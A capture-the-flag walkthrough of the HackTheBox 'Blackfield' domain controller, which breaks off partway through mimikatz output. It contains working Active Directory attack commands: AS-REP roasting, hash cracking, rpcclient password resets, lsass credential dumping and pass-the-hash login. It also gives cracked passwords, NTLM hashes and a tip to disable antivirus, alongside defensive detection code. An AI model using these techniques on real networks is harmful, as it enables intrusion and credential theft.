Name: Blackfield
IP: 10.10.10.192
Points: 40
OS: Windows
Difficulty: Hard
Creator: aas
Out On: 06 June 2020

Brief@Blackfield:~$

The journey starts with an SMB share full of directories whose names turn out to be usernames. I request a TGT (AS-REP) for a valid user and crack it with john. With those creds I can log in to rpcclient, and the user has permission to change another user's password, which is exactly what we need. After changing that password I get access to another share containing a .zip file; unzipping it gives a memory dump file. Dumping it with mimikatz gives us the NTLM hash of a user, and I log in with Evil-WinRM. That user has the right to back up files, so I back up ntds.dit and save the SYSTEM hive, dump the NTLM hashes from the pair with secretsdump, and get the NTLM hash of the administrator.

Summary

  • Anonymous login to the share profiles$
  • Creating a text file from the directory names
  • Generating a TGT for a valid user and saving it to a file
  • Cracking the hash with John
  • Logging in to rpcclient
  • Changing the audit2020 password to one I choose
  • Enumerating the share forensic
  • Found a zip file lsass.zip and unzipped it
  • Got a memory dump file lsass.DMP
  • Dumping the NTLM hashes from the file using mimikatz
  • Login as svc_backup
  • Got user.txt
  • The user svc_backup can back up files
  • Using diskshadow to create a new volume with an alias of C:
  • Copying the ntds.dit
  • Saving the registry hive SYSTEM
  • Dumping the NTLM hashes from the files using secretsdump.py
  • Login as administrator
  • Got root.txt

Pwned

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>


Recon

Nmap

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $cat allports.nmap 
# Nmap 7.92 scan initiated Wed Sep 28 13:50:04 2022 as: nmap -Pn -sV -sC -T4 -p- -v -oN allports.nmap 10.10.10.192
Increasing send delay for 10.10.10.192 from 0 to 5 due to 55 out of 136 dropped probes since last increase.
Nmap scan report for blackfield.htb (10.10.10.192)
Host is up (0.090s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-28 18:58:25Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m29s
| smb2-security-mode: 
| 3.1.1: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2022-09-28T18:58:40
|_ start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 28 13:58:46 2022 -- 1 IP address (1 host up) scanned in 522.15 seconds
┌─[puck@parrot-lt]─[~/htb/blackfield]

The open ports (DNS, Kerberos, RPC, LDAP, SMB and WinRM) tell us this machine is an Active Directory domain controller, DC01.

enum4linux

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $enum4linux blackfield.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Sep 28 13:52:44 2022

========================== 
| Target Information |
========================== 
Target ........... blackfield.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


====================================================== 
| Enumerating Workgroup/Domain on blackfield.htb |
====================================================== 
[E] Can't find workgroup/domain


============================================== 
| Nbtstat Information for blackfield.htb |
============================================== 
Looking up status of 10.10.10.192
No reply from 10.10.10.192

======================================= 
| Session Check on blackfield.htb |
======================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server blackfield.htb allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

============================================= 
| Getting domain SID for blackfield.htb |
============================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
[+] Host is part of a domain (not a workgroup)


We got the domain name BLACKFIELD and the domain SID from enum4linux.

Smbclient

I tried an anonymous login and listed the available shares; here is what I got.

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $smbclient -L blackfield.htb
Enter WORKGROUP\puck's password:

Sharename Type Comment
--------- ---- -------
ADMIN$    Disk Remote Admin
C$        Disk Default share
forensic  Disk Forensic / Audit share.
IPC$      IPC Remote IPC
NETLOGON  Disk Logon server share 
profiles$ Disk 
SYSVOL    Disk Logon server share 
SMB1 disabled -- no workgroup available
┌─[puck@parrot-lt]─[~/htb/blackfield]

So apart from the default shares we have two of interest:

  • forensic
  • profiles$

I tried to log in to the forensic share first.

forensic share

➜   smbclient  //blackfield.htb/forensic             
Enter WORKGROUP\roots password: 
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>

But we are not allowed to list this share, so let's move on to profiles$, which I mounted and listed into a file:

┌─[✗]─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $sudo mount -t cifs -o username=anonymous,domain=blackfield.local //10.10.10.192/profiles$ /mnt/profiles
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ls -1 /mnt/profiles/ > userlist.txt
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $

If we look closely at the directory names, it is clear enough that these are usernames.

Let's check which of them are valid domain users with kerbrute:

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $/opt/kerbrute/kerbrute_linux_amd64 userenum -d blackfield.local --dc 10.10.10.192 userlist.txt -t 100

__ __ __ 
/ /_____ _____/ /_ _______ __/ /____ 
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 09/28/22 - Ronnie Flathers @ropnop

2022/09/28 14:26:02 > Using KDC(s):
2022/09/28 14:26:02 > 10.10.10.192:88

2022/09/28 14:26:08 > [+] VALID USERNAME: audit2020@blackfield.local
2022/09/28 14:26:18 > [+] VALID USERNAME: support@blackfield.local
2022/09/28 14:26:18 > [+] VALID USERNAME: svc_backup@blackfield.local
2022/09/28 14:26:23 > Done! Tested 314 usernames (3 valid) in 20.819 seconds
┌─[puck@parrot-lt]─[~/htb/blackfield]

Using GetNPUsers.py to get a TGT

Now that we have valid users, we can use GetNPUsers.py from impacket to request a TGT (AS-REP) for any user that does not require Kerberos pre-authentication. I output the hash in john format so I can crack it with John the Ripper.

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py BLACKFIELD.LOCAL/ -usersfile validusers.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User audit2020@blackfield.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup@blackfield.local doesn't have UF_DONT_REQUIRE_PREAUTH set
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $cat hashes.txt 
$krb5asrep$support@blackfield.local@BLACKFIELD.LOCAL:e51263a437b0eabadb88c806f5d899e0$4f2736792ae460f97724a3d56bb0fcdd81242deb1c7196297198832155cb33d944e191ff107af1b56684c9f5af1240ba0622a6aa966f8d1a17e2fa736720f2c1c9cb6cc2f9ed6087312d7536f6dc4c07fbe0c0c9e208cb578748fbe6d2e30d015e457c364e348f6638cadbb653d4e6ac93073b5ab335914e25b7bf30667a1054d1f8ac8be95825c2549a9ee5ad71f9c117b4265c9cbd05584f8b613d9e33298b31a7c2d4cdf8f1814f6c3110a3698b988cd505cb76e6927343c33f626974fd6c9134df56a615a5b83ac4750185c8a492ace85575f7ef3e7addb63cbc662b5cf36158e0c6c0ef2ec00ae0e063a8967a245d8ebad1
┌─[puck@parrot-lt]─[~/htb/blackfield]

Time to crack it with john

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $john hashes.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$support@blackfield.local@BLACKFIELD.LOCAL)
1g 0:00:00:14 DONE (2022-09-28 14:32) 0.06863g/s 983939p/s 983939c/s 983939C/s #1WIF3Y.."chito"
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $

And we cracked it: the password for support is #00^BlackKnight.

The creds are valid for SMB, but not for WinRM:

┌─[✗]─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $docker run byt3bl33d3r/crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight 
┌─[puck@parrot-lt]─[~/htb/blackfield]


Login into rpcclient

After some searching for where to use the credentials, I logged in to rpcclient.

Enumerating users

https://ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging

➜  blackfield rpcclient 10.10.10.192 -U support 
Enter WORKGROUP\supports password:#00^BlackKnight 
rpcclient $> enumdomusers 
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
user:[admin1] rid:[0x13ed]

These are the available users on the machine.

Getting info about current user

rpcclient $> queryuser support
        User Name   :   support
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Wed, 10 Jun 2020 16:41:38 EDT
        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST
        Kickoff Time             :      Wed, 31 Dec 1969 19:00:00 EST
        Password last set Time   :      Sun, 23 Feb 2020 12:53:24 EST
        Password can change Time :      Mon, 24 Feb 2020 12:53:24 EST
        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
        unknown_2[0..31]...
        user_rid :      0x450
        group_rid:      0x201
        acb_info :      0x00010210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x0000000b
        padding1[0..7]...
        logon_hrs[0..21]...
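Two artefacts from the steps above explain why support was the account that could be roasted: the $krb5asrep$ line GetNPUsers.py wrote to hashes.txt, and the acb_info value in the queryuser output. The following is an added example, not code from the writeup or from impacket; it decodes the acb_info bits (MS-SAMR USER_ACCOUNT flags) and splits the hash into its fields.

```python
"""Added example, not from the original writeup: pull apart the two artefacts
shown above, the $krb5asrep$ line that GetNPUsers.py wrote to hashes.txt and
the acb_info value from rpcclient's queryuser, to show why the support account
was the one that could be AS-REP roasted."""
from __future__ import annotations

import re

# USER_ACCOUNT flag bits from MS-SAMR; rpcclient prints them as acb_info.
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000004: "PWNOTREQ",
    0x00000010: "NORMAL",
    0x00000200: "PWNOEXP",
    0x00000400: "AUTOLOCK",
    0x00001000: "SMARTCARD_REQUIRED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PW_EXPIRED",
}
# Bits worth an alert in an account audit.
RISKY_ACB = {"PWNOTREQ", "DONT_REQUIRE_PREAUTH", "TRUSTED_FOR_DELEGATION"}

# john writes $krb5asrep$user@REALM:checksum$edata; hashcat's form adds $23$.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?:(?P<etype>\d+)\$)?"
    r"(?P<user>[^:@]+(?:@[^:@]+)?)@(?P<realm>[^:]+)"
    r":(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# Values from the writeup: support's acb_info and the captured hash.
SUPPORT_ACB_INFO = 0x00010210
SUPPORT_HASH = (
    "$krb5asrep$support@blackfield.local@BLACKFIELD.LOCAL:"
    "e51263a437b0eabadb88c806f5d899e0$"
    "4f2736792ae460f97724a3d56bb0fcdd81242deb1c7196297198832155cb33d9"
    "44e191ff107af1b56684c9f5af1240ba0622a6aa966f8d1a17e2fa736720f2c1"
    "c9cb6cc2f9ed6087312d7536f6dc4c07fbe0c0c9e208cb578748fbe6d2e30d01"
    "5e457c364e348f6638cadbb653d4e6ac93073b5ab335914e25b7bf30667a1054"
    "d1f8ac8be95825c2549a9ee5ad71f9c117b4265c9cbd05584f8b613d9e33298b"
    "31a7c2d4cdf8f1814f6c3110a3698b988cd505cb76e6927343c33f626974fd6c"
    "9134df56a615a5b83ac4750185c8a492ace85575f7ef3e7addb63cbc662b5cf3"
    "6158e0c6c0ef2ec00ae0e063a8967a245d8ebad1"
)


def decode_acb_info(value: int) -> list[str]:
    """Names of the set USER_ACCOUNT bits, lowest bit first."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if value & bit]


def risky_acb_flags(value: int) -> list[str]:
    """Subset of decode_acb_info() that a defender should review."""
    return [f for f in decode_acb_info(value) if f in RISKY_ACB]


def parse_asrep_hash(line: str) -> dict:
    """Split a $krb5asrep$ line into user, realm, etype, checksum and edata.

    With pre-auth disabled the KDC hands the AS-REP to anyone who asks for it;
    its enc-part is encrypted under a key derived from the user's password
    (the NT hash for etype 23), so checksum + edata are enough to test
    password guesses offline. That is the whole weakness."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ hash line")
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"]) if fields["etype"] else 23
    fields["edata_bytes"] = len(fields["edata"]) // 2
    return fields


def explain(acb_info: int, hash_line: str) -> str:
    """One-line verdict tying the account flags to the captured hash."""
    h = parse_asrep_hash(hash_line)
    flags = decode_acb_info(acb_info)
    verdict = ("roastable" if "DONT_REQUIRE_PREAUTH" in flags
               else "NOT roastable (pre-auth required)")
    return (f"{h['user']}@{h['realm']}: acb_info=0x{acb_info:08x} -> {flags}; "
            f"{verdict}; etype {h['etype']}, {h['edata_bytes']} bytes of enc-part")


if __name__ == "__main__":
    print(explain(SUPPORT_ACB_INFO, SUPPORT_HASH))
```

The 0x00010000 bit is what GetNPUsers.py reports as UF_DONT_REQUIRE_PREAUTH; audit2020 and svc_backup do not have it, which is why only support produced a hash.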

Available privileges

rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)
rpcclient $> 

These are the privileges available to the current user. From a few of them I concluded that the user can change other users' passwords.

https://malicious.link/post/2017/reset-ad-user-password-with-linux/

I tried almost all the available users, and I succeeded in changing the password of audit2020:

rpcclient $> setuserinfo2 audit2020 23 'Geheim123!'
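From the defender's side, the reset above is visible on the domain controller: a SAMR SetUserInfo2 call like this one is logged as Security event 4724 (an attempt was made to reset an account's password), and the attacker's subsequent use of the new password shows up as a network logon (4624, LogonType 3) of the same account shortly afterwards. The following is an added example, not code from the writeup; it runs two such detections over constructed event records, and the approved/protected account lists are assumptions.

```python
"""Added example, not from the original writeup: detection logic for the
password reset shown above. When rpcclient's setuserinfo2 (SAMR SetUserInfo2)
resets a password, the domain controller logs Security event 4724 naming the
caller in SubjectUserName and the victim in TargetUserName; a later network
logon of the victim account is event 4624 with LogonType 3. The records below
are constructed to mirror the writeup, and the approved/protected account
lists are assumptions."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class SecurityEvent:
    time: str            # TimeCreated, ISO 8601
    event_id: int        # 4724 = password reset attempt, 4624 = successful logon
    subject: str = ""    # SubjectUserName: who made the call (4724)
    target: str = ""     # TargetUserName: account reset (4724) or logged on (4624)
    logon_type: int = 0  # 4624 only; 3 = network
    ip: str = ""         # 4624 only; IpAddress


# Constructed sample log, not a real export; the attacker IP is made up.
SAMPLE_EVENTS = [
    SecurityEvent("2022-09-28T09:00:00", 4724, subject="helpdesk01", target="lydericlefebvre"),
    SecurityEvent("2022-09-28T09:05:00", 4724, subject="helpdesk01", target="Administrator"),
    SecurityEvent("2022-09-28T14:40:00", 4724, subject="support", target="audit2020"),
    SecurityEvent("2022-09-28T14:41:30", 4624, target="audit2020", logon_type=3, ip="10.10.14.5"),
    SecurityEvent("2022-09-28T15:10:00", 4624, target="svc_backup", logon_type=3, ip="10.10.14.5"),
]
APPROVED_RESETTERS = {"helpdesk01"}                              # assumption: accounts allowed to reset passwords
PROTECTED_TARGETS = {"administrator", "krbtgt", "svc_backup"}   # assumption: tier-0 accounts


def suspicious_resets(events, approved=APPROVED_RESETTERS, protected=PROTECTED_TARGETS):
    """Flag 4724s by a caller outside the approved set, and approved callers
    touching protected accounts. Returns (rule, subject, target) tuples."""
    alerts = []
    for e in events:
        if e.event_id != 4724:
            continue
        if e.subject.lower() not in approved:
            alerts.append(("unapproved-reset", e.subject, e.target))
        elif e.target.lower() in protected:
            alerts.append(("protected-target-reset", e.subject, e.target))
    return alerts


def reset_then_use(events, window=timedelta(minutes=30)):
    """Pair each 4724 with the first network logon of the same account inside
    the window: reset a password, then use it, exactly the sequence above."""
    logons = [e for e in events if e.event_id == 4624 and e.logon_type == 3]
    hits = []
    for r in (e for e in events if e.event_id == 4724):
        t0 = datetime.fromisoformat(r.time)
        for l in logons:
            t1 = datetime.fromisoformat(l.time)
            if l.target.lower() == r.target.lower() and t0 <= t1 <= t0 + window:
                hits.append((r.target, r.subject, l.ip))
                break
    return hits


if __name__ == "__main__":
    for a in suspicious_resets(SAMPLE_EVENTS):
        print("ALERT", *a)
    for h in reset_then_use(SAMPLE_EVENTS):
        print("RESET-THEN-USE target=%s by=%s from=%s" % h)
```

The second rule is the more robust one: a helpdesk account resetting a password is normal, but a reset followed within minutes by a network logon of that account from elsewhere is what the walkthrough above actually looks like in the log.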

I also checked LDAP, but found nothing interesting:

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ldapsearch -h 10.10.10.192 -b "DC=BLACKFIELD,DC=local" -D 'support@blackfield.local' -w '#00^BlackKnight' > support_ldap_dump
┌─[puck@parrot-lt]─[~/htb/blackfield]

I tried Kerberoasting too, but no SPNs were found:

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.192 'blackfield.local/support:#00^BlackKnight'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

No entries found!
┌─[puck@parrot-lt]─[~/htb/blackfield]


┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
INFO: Found 52 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 20S
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ls
20220928150457_computers.json allports.nmap users.txt
20220928150457_domains.json hashes.txt validusers.txt
20220928150457_groups.json support_ldap_dump
20220928150457_users.json userlist.txt
┌─[puck@parrot-lt]─[~/htb/blackfield]


Now I can log in with smbclient as audit2020 and enumerate the forensic share.

smbclient  //blackfield.htb/forensic -U audit2020
Enter WORKGROUP\audit2020s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020

                7846143 blocks of size 4096. 3523743 blocks available
smb: \> 

The user audit2020 has permission to read the share.

Got the file lsass.zip

After some manual enumeration I found a .zip file called lsass.zip in the memory_analysis directory; it was hard to spot among so many files.

smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip SMBecho failed (NT_STATUS_CONNECTION_DISCONNECTED). The connection is disconnected now

➜  blackfield 

But I got an NT_STATUS_IO_TIMEOUT error while downloading the file, maybe because the file is too large.

Mounting the share locally

I can also mount the forensic share on my machine and walk the directories like regular ones.

Mount it with the mount utility from cifs-utils:

➜  blackfield mount -t cifs //10.10.10.192/forensic /mnt -o user=audit2020
Password for audit2020@//10.10.10.192/forensic:  **********
➜  blackfield

Now I can head to the /mnt directory:

➜  /mnt ls
commands_output  memory_analysis  tools
➜  /mnt 

And now I can copy the zip file from here:

➜  memory_analysis cp lsass.zip /home/prashant/

Unzipping the file:

➜  prashant unzip lsass.zip
Archive:  lsass.zip
  inflating: lsass.DMP               
➜  prashant 

A .DMP file is a memory dump, created when a program crashes or something goes wrong.

It can contain useful information, which is why mimikatz has a feature to parse such dumps and extract things like NTLM hashes.
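A file like lsass.DMP on a share is a finding in itself, and it is cheap to triage: Windows process dumps are minidumps, a fixed header starting with 'MDMP' followed by a directory of streams, and the module list stores paths as UTF-16LE strings. The following is an added example, not code from the writeup or from mimikatz; it parses that header, lists the streams, and answers the questions a responder would ask about a dump found on a share. The dump bytes are constructed inline so the example runs offline.

```python
"""Added example, not from the original writeup: a small triage tool for .DMP
files like the lsass.DMP found above. Windows process dumps are minidumps: a
fixed header starting with 'MDMP', then a directory of streams. Parsing that
is enough to tell a real process dump from a renamed file, to see whether it
carries full memory, and to spot a dump of lsass.exe sitting on a share."""
import struct

MDMP_SIGNATURE = 0x504D444D   # 'MDMP' read as a little-endian uint32
MDMP_VERSION = 0xA793         # low 16 bits of the Version field
STREAM_NAMES = {
    3: "ThreadListStream", 4: "ModuleListStream", 5: "MemoryListStream",
    6: "ExceptionStream", 7: "SystemInfoStream", 9: "Memory64ListStream",
    15: "MiscInfoStream", 16: "MemoryInfoListStream", 17: "ThreadInfoListStream",
}
# MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva,
# CheckSum, TimeDateStamp, Flags (64-bit).
HEADER_FMT = "<IIIIIIQ"
DIRENTRY_FMT = "<III"         # MINIDUMP_DIRECTORY: StreamType, DataSize, Rva
MINIDUMP_WITH_FULL_MEMORY = 0x2


def is_minidump(data: bytes) -> bool:
    return len(data) >= struct.calcsize(HEADER_FMT) and \
        struct.unpack_from("<I", data, 0)[0] == MDMP_SIGNATURE


def parse_minidump(data: bytes) -> dict:
    """Return header fields and the stream directory as (name, size, rva)."""
    if not is_minidump(data):
        raise ValueError("not a minidump: bad signature or too short")
    _sig, version, nstreams, dir_rva, _csum, timestamp, flags = \
        struct.unpack_from(HEADER_FMT, data, 0)
    if version & 0xFFFF != MDMP_VERSION:
        raise ValueError(f"unexpected minidump version 0x{version & 0xFFFF:04x}")
    entry_size = struct.calcsize(DIRENTRY_FMT)
    streams = []
    for i in range(nstreams):
        stype, size, rva = struct.unpack_from(DIRENTRY_FMT, data, dir_rva + i * entry_size)
        streams.append((STREAM_NAMES.get(stype, f"Unknown({stype})"), size, rva))
    return {"version": version & 0xFFFF, "timestamp": timestamp,
            "flags": flags, "streams": streams}


def triage_dump(data: bytes) -> dict:
    """Defender-side questions about a dump file found on a share."""
    info = parse_minidump(data)
    names = {name for name, _, _ in info["streams"]}
    return {
        "stream_count": len(info["streams"]),
        # Full-memory dumps carry a Memory64ListStream (and the flag bit).
        "has_full_memory": "Memory64ListStream" in names
                           or bool(info["flags"] & MINIDUMP_WITH_FULL_MEMORY),
        # Module paths are UTF-16LE, so a cheap scan finds the process name.
        "mentions_lsass": "lsass.exe".encode("utf-16-le") in data.lower(),
    }


def build_sample_dump(timestamp: int = 1582500000) -> bytes:
    """Constructed minimal dump: header, 3 directory entries, a fake module path."""
    module_path = "C:\\Windows\\System32\\lsass.exe".encode("utf-16-le")
    sysinfo = bytes(56)                                          # placeholder system info
    modules = struct.pack("<I", len(module_path)) + module_path  # MINIDUMP_STRING-like
    mem64 = bytes(16)                                            # placeholder memory list
    dir_rva = struct.calcsize(HEADER_FMT)
    body_rva = dir_rva + 3 * struct.calcsize(DIRENTRY_FMT)
    directory = (
        struct.pack(DIRENTRY_FMT, 7, len(sysinfo), body_rva)
        + struct.pack(DIRENTRY_FMT, 4, len(modules), body_rva + len(sysinfo))
        + struct.pack(DIRENTRY_FMT, 9, len(mem64), body_rva + len(sysinfo) + len(modules))
    )
    header = struct.pack(HEADER_FMT, MDMP_SIGNATURE, MDMP_VERSION, 3, dir_rva,
                         0, timestamp, MINIDUMP_WITH_FULL_MEMORY)
    return header + directory + sysinfo + modules + mem64


if __name__ == "__main__":
    print(triage_dump(build_sample_dump()))
```

The string scan is deliberately crude; for a real file the ModuleListStream would be walked to read MINIDUMP_MODULE entries, but the signature and directory check alone already separates a process dump from a renamed zip or installer.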

I copied the .DMP file to my Windows machine and downloaded mimikatz there.

Disable Windows virus protection first, or it will not let you download mimikatz.

https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf

https://github.com/gentilkiwi/mimikatz/releases

Load mimikatz.exe and run:

sekurlsa::minidump /users/0xPrashant/Desktop/lsass.DMP

sekurlsa::LogonPasswords

And done! I got the hashes of two users:

  • svc_backup
  • administrator

Opening : '/users/0xPrashant/Desktop/lsass.DMP' file for minidump...

Authentication Id : 0 ; 406458 (00000000:000633ba)
Session           : Interactive from 2
User Name         : svc_backup
Domain            : BLACKFIELD
Logon Server      : DC01
Logon Time        : 23-02-2020 23:30:03
SID               : S-1-5-21-4194615774-2175524697-3563712290-1413
        msv :
         [00000003] Primary
         * Username : svc_backup
         * Domain   : BLACKFIELD
         * NTLM     : 9658d1d1dcd9250115e2205d9f48400d
         * SHA1     : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
         * DPAPI    : a03cd8e9d30171f3cfe8caad92fef621
        tspkg :
